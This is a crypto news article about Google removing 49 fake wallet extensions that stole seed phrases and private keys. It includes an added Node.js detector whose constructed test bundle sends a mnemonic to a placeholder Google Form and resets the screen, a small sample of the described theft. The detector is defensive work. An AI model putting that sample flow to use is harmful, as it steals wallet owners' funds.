Google removed 49 Chrome extensions from its Web Store that posed as legitimate cryptocurrency wallets but contained code that stole wallet private keys and other sensitive information. ZDNet was first to report the news, noting that the extensions impersonated well-known crypto wallets including Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus and KeepKey.
The extensions were discovered by Harry Denley, security director at MyCrypto. As he pointed out, all of them appear to have been put together by the same person or group, believed to be a Russia-based threat actor. As he wrote in a blog post on Medium, malicious browser extensions have always existed, but the brands targeted this time are new.
The 49 extensions were installed by users who had no reason to believe they were not bona fide: each was advertised as a way to manage a wallet and make crypto-wallet transactions.
In reality, the extensions phished for the user's secrets, including mnemonic phrases (the list of words used to recover a crypto wallet), private keys and keystore files. Once the user enters this data into the extension, it is sent to the actor's backend or to a Google Form, from where the bad actors collect the secrets and empty the accounts.
After sending the data off, the extension returns the user to its default screen, as Denley explained. The user either gets frustrated and submits their "secret phrase" once again, or uninstalls the extension, even though the wallet and its secrets have already been compromised and the funds may be drained at any time.
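The flow described above (a "restore" form collects a seed phrase or private key, POSTs it to a non-vendor backend or a Google Form, then resets the UI) leaves a recognisable footprint in an extension's source. The following is an added example written for this page, not code from the removed extensions or from MyCrypto: a small Node.js triage pass over an unpacked extension bundle held in memory. The two bundles, the placeholder Google Form URL and the `example-wallet.test` vendor hostnames are constructed for illustration.

```javascript
// Added example for this page: a static triage pass over an unpacked Chrome
// extension bundle, looking for the pattern the article describes (a "restore"
// form that collects a seed phrase, private key or keystore and POSTs it to a
// non-vendor backend or a Google Form, then resets the UI). Not code from the
// removed extensions or from MyCrypto. Runs under Node.js on in-memory files;
// the two bundles at the bottom are constructed for illustration.

// Network sinks through which collected form data typically leaves a page.
const SINK_RE = /(?:\b(?:fetch|XMLHttpRequest)\b|\bnavigator\.sendBeacon\b|\$\.(?:ajax|post)\b)/;
// Google Forms submission endpoint, one of the collection channels named above.
const GOOGLE_FORM_RE = /docs\.google\.com\/forms\/[^\s"'`]*formResponse/i;
// Any hard-coded absolute http(s) URL in a script.
const URL_RE = /https?:\/\/[a-z0-9.-]+(?::\d+)?(?:\/[^\s"'`)]*)?/gi;
// Identifiers a wallet "restore"/"unlock" screen would use for the secret itself.
const SECRET_FIELD_RE = /\b(?:mnemonic|seed(?:[_-]?phrase)?|recovery[_-]?phrase|private[_-]?key|keystore|secret[_-]?phrase)\b/i;
// Permission patterns that let the extension reach any origin
// (MV2 "permissions" or MV3 "host_permissions").
const BROAD_HOST_RE = /^(?:<all_urls>|\*:\/\/\*\/\*|https?:\/\/\*\/\*)$/;

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// files: { path -> contents } of the unpacked bundle.
// vendorHosts: hostnames the impersonated wallet legitimately talks to (assumed input).
// Returns { verdict: 'suspicious' | 'clean', findings: [{ file, reason }] }.
function triageExtension(files, vendorHosts) {
  const findings = [];
  const allowed = new Set(vendorHosts.map(h => h.toLowerCase()));

  let manifest = {};
  try {
    manifest = JSON.parse(files['manifest.json'] || '{}');
  } catch {
    findings.push({ file: 'manifest.json', reason: 'manifest is not valid JSON' });
  }
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  const broad = perms.filter(p => typeof p === 'string' && BROAD_HOST_RE.test(p));
  if (broad.length) {
    findings.push({ file: 'manifest.json', reason: 'broad host permissions: ' + broad.join(', ') });
  }

  for (const [path, src] of Object.entries(files)) {
    if (!path.endsWith('.js')) continue;
    const collectsSecret = SECRET_FIELD_RE.test(src);
    const hasSink = SINK_RE.test(src);
    const urls = [...new Set(src.match(URL_RE) || [])];
    const offVendor = urls.filter(u => { const h = hostOf(u); return h && !allowed.has(h); });
    const googleForm = urls.find(u => GOOGLE_FORM_RE.test(u));

    if (googleForm) {
      findings.push({ file: path, reason: 'submits to a Google Form: ' + googleForm });
    }
    if (collectsSecret && hasSink && offVendor.length) {
      findings.push({ file: path, reason: 'reads a wallet secret and sends it off-vendor: ' + offVendor.join(', ') });
    }
  }
  // Broad permissions alone are common in legitimate extensions; the verdict turns
  // on a script that actually handles a secret and has somewhere foreign to send it.
  const verdict = findings.some(f => f.file !== 'manifest.json') ? 'suspicious' : 'clean';
  return { verdict, findings };
}

// Constructed bundle mimicking the described phishing flow (placeholder URLs).
const PHISHING_BUNDLE = {
  'manifest.json': JSON.stringify({
    manifest_version: 2, name: 'Example Wallet Helper', version: '1.0',
    permissions: ['storage', 'https://*/*'],
  }),
  'popup.js': [
    "document.querySelector('#restore').addEventListener('submit', async (e) => {",
    "  e.preventDefault();",
    "  const mnemonic = document.querySelector('#mnemonic').value;",
    "  await fetch('https://docs.google.com/forms/d/e/PLACEHOLDER/formResponse', {",
    "    method: 'POST', body: new URLSearchParams({ 'entry.1': mnemonic }) });",
    "  location.reload(); // drop the user back to the default screen",
    "});",
  ].join('\n'),
};

// Constructed bundle for a benign wallet that only talks to its own API.
const BENIGN_BUNDLE = {
  'manifest.json': JSON.stringify({
    manifest_version: 2, name: 'Example Wallet', version: '1.0', permissions: ['storage'],
  }),
  'popup.js': "fetch('https://api.example-wallet.test/balance').then(r => r.json()).then(render);",
};

const VENDOR_HOSTS = ['example-wallet.test', 'api.example-wallet.test']; // assumed for the sample

console.log(triageExtension(PHISHING_BUNDLE, VENDOR_HOSTS)); // verdict: 'suspicious'
console.log(triageExtension(BENIGN_BUNDLE, VENDOR_HOSTS));   // verdict: 'clean'
```

The check is deliberately conservative: a script that reads a mnemonic but only writes it to `chrome.storage` is not flagged, and broad host permissions on their own are only noted, since many legitimate extensions request them. Obfuscated bundles can hide the URL and field names this pass keys on, so a clean result is a triage signal, not proof of safety.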
The good news is that Google has now removed all 49 extensions that showed these characteristics. Notably, Denley entered the credentials of a test account into one of the extensions, but the funds were not immediately stolen. He told ZDNet that the threat actor may only want to steal from high-value accounts, or may not have worked out how to automate the thefts and has to access each account manually. Either way, a delay is no reassurance: any wallet whose secret phrase was entered into one of these extensions should be treated as compromised and its funds moved to a fresh wallet.
Still, thefts are happening. As our Bitcoin scam news show, the most targeted brand was Ledger (57% of the extensions), followed by MyEtherWallet (22%).
DC Forecasts is a leader in many crypto news categories, striving for the highest journalistic standards and abiding by a strict set of editorial policies. If you are interested to offer your expertise or contribute to our news website, feel free to contact us at editor@dcforecasts.com